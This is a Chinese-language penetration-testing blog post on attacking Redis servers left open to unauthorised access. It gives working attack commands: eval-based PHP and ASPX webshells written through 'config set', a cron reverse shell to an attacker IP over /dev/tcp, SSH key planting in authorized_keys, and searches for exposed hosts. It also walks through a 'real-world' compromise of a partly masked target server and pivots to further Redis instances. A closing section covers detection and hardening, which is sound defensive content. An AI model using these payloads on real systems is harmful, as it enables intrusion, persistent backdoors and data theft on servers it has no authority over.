simeon

Redis在大公司被大量應用，通過筆者的研究發現，目前在互聯網上已經出現Redis未經授權病毒似自動攻擊，攻擊成功後會對內網進行掃描、控制、感染以及用來進行挖礦、勒索等惡意行為，早期網上曾經分析過一篇文章“通過redis感染linux版本勒索病毒的服務器”（http://www.sohu.com/a/143409075_765820），如果公司使用了Redis，那麽應當給予重視，通過實際研究，當在一定條件下，攻擊者可以獲取webshell，甚至root權限。

1.1.1 Redis簡介及搭建實驗環境

REmote DIctionary Server(Redis) 是一個由Salvatore Sanfilippo寫的key-value存儲系統。

Redis是一個開源的使用ANSI C語言編寫、遵守BSD協議、支持網絡、可基於內存亦可持久化的日誌型、Key-Value數據庫，並提供多種語言的API。它通常被稱為數據結構服務器，因為值（value）可以是字符串(String), 哈希(Map), 列表(list), 集合(sets) 和有序集合(sorted sets)等類型。從2010年3月15日起，Redis的開發工作由VMware主持。從2013年5月開始，Redis的開發由Pivotal贊助。目前最新穩定版本為4.0.8。

1.Redis默認端口

Redis默認配置端口為6379，sentinel.conf配置器端口為26379

2.官方站點

https://redis.io/

http://download.redis.io/releases/redis-3.2.11.tar.gz

3.安裝redis

wget http://download.redis.io/releases/redis-4.0.8.tar.gz

tar –xvf redis-4.0.8.tar.gz

cd redis-4.0.8

make

最新版本前期漏洞已經修復，測試時建議安裝3.2.11版本。

4.修改配置文件redis.conf

（1）cp redis.conf ./src/redis.conf

（2）bind 127.0.0.1前面加上#號註釋掉

（3）protected-mode設為no

（4）啟動redis-server

./src/redis-server redis.conf

最新版安裝成功後，如圖1所示。默認的配置是使用6379端口，沒有密碼。這時候會導致未授權訪問然後使用redis權限寫文件。

圖1安裝配置redis

5.連接Redis服務器

（1）交互式方式

redis-cli -h {host} -p {port}方式連接，然後所有的操作都是在交互的方式實現，不需要再執行redis-cli了，例如命令：redis-cli -h 127.0.0.1-p 6379，加-a參數表示帶密碼的訪問。

（2）命令方式

redis-cli -h {host} -p {port} {command}直接得到命令的返回結果.

6.常見命令

（1）查看信息：info

（2）刪除所有數據庫內容：flushall

（3）刷新數據庫：flushdb

（4）看所有鍵：KEYS *，使用select num可以查看鍵值數據。

（5）設置變量：set test “who am i”

（6）config set dir dirpath 設置路徑等配置

（7）config get dir/dbfilename 獲取路徑及數據配置信息

（8）save保存

（9）get 變量，查看變量名稱

更多命令可以參考文章：https://www.cnblogs.com/kongzhongqijing/p/6867960.html

7.相關漏洞

因配置不當可以未經授權訪問，攻擊者無需認證就可以訪問到內部數據，其漏洞可導致敏感信息泄露（Redis服務器存儲一些有趣的session、cookie或商業數據可以通過get枚舉鍵值），也可以惡意執行flushall來清空所有數據，攻擊者還可通過EVAL執行lua代碼，或通過數據備份功能往磁盤寫入後門文件。如果Redis以root身份運行，可以給root賬戶寫入SSH公鑰文件，直接免密碼登錄服務器，其相關漏洞信息如下：

（1）Redis 遠程代碼執行漏洞(CVE-2016-8339)

Redis 3.2.x < 3.2.4版本存在緩沖區溢出漏洞，可導致任意代碼執行。Redis數據結構存儲的CONFIG SET命令中client-output-buffer-limit選項處理存在越界寫漏洞。構造的CONFIG SET命令可導致越界寫，代碼執行。

（2）CVE-2015-8080

Redis 2.8.x在2.8.24以前和3.0.x 在3.0.6以前版本，lua_struct.c中存在getnum函數整數溢出，允許上下文相關的攻擊者許可運行Lua代碼（內存損壞和應用程序崩潰）或可能繞過沙盒限制意圖通過大量，觸發基於棧的緩沖區溢出。

（3）CVE-2015-4335

Redis 2.8.1之前版本和3.0.2之前3.x版本中存在安全漏洞。遠程攻擊者可執行eval命令利用該漏洞執行任意Lua字節碼

（4）CVE-2013-7458讀取“.rediscli_history”配置文件信息。

1.1.2 Redis攻擊思路

1. 內網端口掃描

nmap -v -n -Pn -p 6379 -sV --scriptredis-info 192.168.56.1/24

2.通過文件包含讀取其配置文件

Redis配置文件中一般會設置明文密碼，在進行滲透時也可以通過webshell查看其配置文件，Redis往往不只一臺計算機，可以利用其來進行內網滲透，或者擴展權限滲透。

3.使用Redis暴力破解工具

https://github.com/evilpacket/redis-sha-crack，其命令為：

node ./redis-sha-crack.js -w wordlist.txt -s shalist.txt 127.0.0.1 host2.example.com:5555

需要安裝node：

git clone https://github.com/nodejs/node.git

chmod -R 755 node

cd node

./configure

make

4.msf下利用模塊

auxiliary/scanner/redis/file_upload normal Redis File Upload

auxiliary/scanner/redis/redis_login normal Redis Login Utility

auxiliary/scanner/redis/redis_server normal Redis Command Execute Scanner

1.1.3Redis漏洞利用

1. 獲取webshell

當redis權限不高時，並且服務器開著web服務，在redis有web目錄寫權限時，可以嘗試往web路徑寫webshell，前提是知道物理路徑，精簡命令如下：

config set dir E:/www/font

config set dbfilename redis2.aspx

set a "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>"

save

2.反彈shell

（1）連接Redis服務器

redis-cli –h 192.168.106.135 –p 6379

（2）在192.168.106.133上執行

nc –vlp 7999

(3)執行以下命令

set x "\n\n* * * * * bash -i >& /dev/tcp/192.168.106.133/7999 0>&1\n\n"

config set dir /var/spool/cron/

ubantu文件為：/var/spool/cron/crontabs/

config set dir /var/spool/cron/crontabs/

config set dbfilename root

save

3.免密碼登錄ssh

ssh-keygen -t rsa

config set dir /root/.ssh/

config set dbfilename authorized_keys

set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZA3SEwRcvoYWXRkXoxu7BlmhVQz7Dd8H9ZFV0Y0wKOok1moUzW3+rrWHRaSUqLD5+auAmVlG5n1dAyP7ZepMkZHKWU94TubLBDKF7AIS3ZdHHOkYI8y0NRp6jvtOroZ9UO5va6Px4wHTNK+rmoXWxsz1dNDjO8eFy88Qqe9j3meYU/CQHGRSw0/XlzUxA95/ICmDBgQ7E9J/tN8BWWjs5+sS3wkPFXw1liRqpOyChEoYXREfPwxWTxWm68iwkE3/22LbqtpT1RKvVsuaLOrDz1E8qH+TBdjwiPcuzfyLnlWi6fQJci7FAdF2j4r8Mh9ONT5In3nSsAQoacbUS1lul root@kali2018\n\n\n"

save

執行效果如圖2所示。

圖2Redis漏洞SSH免密碼登錄

4.使用漏洞搜索引擎搜索

（1）對“port: 6379”進行搜索

https://www.zoomeye.org/searchResult?q=port:6379

（2）除去顯示“-NOAUTH Authentication required.”的結果，顯示這個信息表示需要進行認證，也即需要密碼才能訪問。

（3）https://fofa.so/

關鍵字檢索：port="6379" && protocol==redis && country=CN

1.1.4 Redis賬號獲取webshell實戰

1.掃描某目標服務器端口信息

通過nmap對某目標服務器進行全端口掃描，發現該目標開放Redis的端口為3357，默認端口為6379端口，再次通過iis put scaner軟件進行同網段服務器該端口掃描，如圖3所示，獲取兩臺開放該端口的服務器。

圖3掃描同網段開放該端口的服務器

2.使用telnet登錄服務器

使用命令“telnet ip port”命令登錄，例如telnet 1**.**.**.78 3357，登錄後，輸入auth和密碼進行認證。

3.查看並保存當前的配置信息。

通過“config get命令”查看dir和dbfilename的信息，並復制下來留待後續恢復使用。

config get dir

config get dbfilename

4.配置並寫入webshell

（1）設置路徑

config set dir E:/www/font

（2）設置數據庫名稱

將dbfilename對名稱設置為支持腳本類型的文件，例如網站支持php，則設置file.php即可，本例中為aspx，所以設置redis.aspx。

config set dbfilename redis.aspx

（3）設置webshell的內容

根據實際情況來設置webshell的內容，webshell僅僅為一個變量，可以是a等其他任意字符，下面為一些參考示例。

set webshell "<?php phpinfo(); ?>"

//php查看信息

set webshell "<?php @eval($_POST['chopper']);?> "

//phpwebshell

set webshell "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>"

// aspx的webshell，註意雙引號使用\"

（4）保存寫入的內容

save

（5）查看webshell的內容

get webshell

完整過程執行命令如圖4所示，每一次命令顯示“+OK”表示配置成功。

圖4寫入webshell

5. 測試webshell是否正常

在瀏覽器中輸入對應寫入文件的名字，如圖5所示進行訪問，出現類似：

“REDIS0006?webshell'a@H攙???”則表明正確獲取webshell。

圖5測試webshell是否正常

6.獲取webshell

如圖6所示，使用中國菜刀後門管理連接工具，成功獲取該網站的webshell。

圖6獲取webshell

7.恢復原始設置

（1）恢復dir

config set dir dirname

（2）恢復dbfilename

config set dbfilename dbfilename

（3）刪除webshell

del webshell

（4）刷新數據庫

flushdb

8.完整命令總結

telnet 1**.**.**.35 3357

auth 123456

config get dir

config get dbfilename

config set dir E:/www/

config set dbfilename redis2.aspx

set a "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>"

save

get a

9.查看redis配置conf文件

通過webshell，在其對應目錄中發現還存在其它地址的redis，通過相同方法可以再次進行滲透，如圖7所示，可以看到路徑、端口、密碼等信息。

圖7查看redis其配置文件

1.1.5Redis入侵檢測和安全防範

1.入侵檢測

（1）檢測key

通過本地登錄，通過“keys *”命令查看，如果有入侵則其中會有很多的值，如圖8所示，在keys *執行成功後，可以看到有trojan1和trojan2命令，執行get trojan1即可進行查看。

圖8檢查keys

（2）linux下需要檢查authorized_keys

Redis內建了名為crackit的key，也可以是其它值，同時Redis的conf文件中dir參數指向了/root/.ssh，/root/.ssh/authorized_keys被覆蓋或者包含Redis相關的內容，查看其值就可以知道是否被入侵過。

（3）對網站進行webshell掃描和分析，發現利用Redis賬號漏洞的，則在shell中會村在Redis字樣。

（4）對服務器進行後門清查和處理。

2.修復辦法

（1）禁止公網開放Redis端口,可以在防火墻上禁用6379 Redis的端口

（2）檢查authorized_keys是否非法，如果已經被修改，則可以重新生成並恢復，不能使用修改過的文件。並重啟ssh服務（service ssh restart）

（3）增加 Redis 密碼驗證

首先停止REDIS服務，打開redis.conf配置文件（不同的配置文件，其路徑可能不同） /etc/redis/6379.conf，找到# # requirepass foobared去掉前面的#號，然後將foobared改為自己設定的密碼，重啟啟動redis服務。

（4）修改conf文件禁止全網訪問，打開6379.conf文件，找到bind0.0.0.0前面加上# （禁止全網訪問）。

3.可參考加固修改命令

port 修改redis使用的默認端口號

bind 設定redis監聽的專用IP

requirepass 設定redis連接的密碼

rename-command CONFIG ""　 ＃禁用CONFIG命令

rename-command info info2 #重命名info為info2

更多攻防文章可以訪問本人專欄：滲透攻擊入門到實踐，讓SQLmap子*彈飛一會兒 http://blog.51cto.com/cloumn/detail/3

參考文章：

http://cve.scap.org.cn/CVE-2015-8080.html

http://cve.scap.org.cn/CVE-2015-4335.html

Redis漏洞利用與防禦